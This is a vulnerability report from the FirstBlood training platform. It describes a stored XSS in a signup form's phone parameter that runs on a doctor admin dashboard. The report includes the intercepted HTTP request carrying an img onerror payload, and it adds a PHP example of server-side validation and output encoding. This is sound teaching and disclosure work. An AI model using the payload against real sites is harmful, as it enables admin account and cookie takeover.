FirstBlood-#1010 — Stored XSS on doctor admin dashboard
This issue was discovered on FirstBlood v3
On 2022-12-08, properlay Level 7 reported:
Hello, I found a stored XSS vulnerability on the doctor admin panel.
To reproduce:
- Visit https://7b0a93c7239c-properlay.a.firstbloodhackers.com/hackerback.html.
- When signing up for the HackerBack event, turn Burp Suite intercept ON.
- Fill in the full name and phone number and click sign up.
- In the intercepted request, change the phone parameter value to phone=1<img+src=x+onerror=alert(0)>
POST /api/hackerback.php HTTP/1.1
Host: 7b0a93c7239c-properlay.a.firstbloodhackers.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Origin: https://7b0a93c7239c-properlay.a.firstbloodhackers.com
Referer: https://7b0a93c7239c-properlay.a.firstbloodhackers.com/hackerback.html
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
full_name=test&phone=1<img+src=x+onerror=alert(0)>&submit=Signup
- Forward the request. The XSS will execute on the admin dashboard.
Impact:
Can take over the doctor admin account by stealing the cookie.
P1 CRITICAL
FirstBlood ID: 59
Vulnerability Type: Stored XSS
It is possible to execute XSS against the admin via the phone parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads, but that attribute only constrains the browser's form UI; a proxied request bypasses it entirely, and the stored value was later rendered unescaped in the admin dashboard.
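The following is an added example (not FirstBlood's code) of how the server side of a signup handler like /api/hackerback.php would be written so that the HTML "tel" input type is never relied on as validation: the phone value is checked against a strict allowlist before storage, and every stored field is HTML-encoded at render time regardless. The function names and the two constructed request bodies are assumptions for illustration.

```php
<?php
// Added example, not the original application's code.
// Demonstrates server-side validation of the phone parameter plus
// output encoding on the admin dashboard, the two controls that
// the "tel" input type does not provide.
declare(strict_types=1);

/**
 * Validate a phone number server-side with a strict allowlist.
 * Spaces and hyphens between digit groups are stripped; what remains
 * must be an optional '+' followed by 6 to 15 digits. Anything else
 * (including '<', '>' or quotes) is rejected before it reaches storage.
 * Returns the normalised number, or null when the input is not a phone number.
 */
function validatePhone(string $raw): ?string
{
    $digits = preg_replace('/[ \-]/', '', trim($raw));
    if ($digits === null || preg_match('/^\+?[0-9]{6,15}$/', $digits) !== 1) {
        return null;
    }
    return $digits;
}

/**
 * Escape a stored value for insertion into HTML element content.
 * Output encoding is the control that actually stops stored XSS, so it
 * is applied at render time even for values that were validated on input.
 */
function renderCell(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed request bodies using the report's parameter names (assumed input).
$requests = [
    ['full_name' => 'test', 'phone' => '1<img src=x onerror=alert(0)>'],
    ['full_name' => 'test', 'phone' => '+44 7700 900123'],
];

foreach ($requests as $post) {
    $phone = validatePhone($post['phone'] ?? '');
    if ($phone === null) {
        // The vulnerable handler stored the raw value; this one rejects it.
        // The rejected value is still encoded before being echoed back.
        echo 'rejected: ' . renderCell($post['phone'] ?? '') . "\n";
        continue;
    }
    // The row the admin dashboard would emit for an accepted signup.
    echo '<td>' . renderCell($post['full_name'] ?? '') . '</td>'
       . '<td>' . renderCell($phone) . '</td>' . "\n";
}
```

Run with `php example.php`: the first constructed body is reported as rejected (with the payload's angle brackets shown as `&lt;` and `&gt;`), and the second produces a table row containing `+447700900123`. The design choice worth noting is that validation and encoding are independent: the allowlist keeps junk out of the database, while `htmlspecialchars` at the rendering point protects the dashboard even for rows written before the validation existed.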
Creator & Administrator
Congratulations, you were the first user to discover this finding, great job!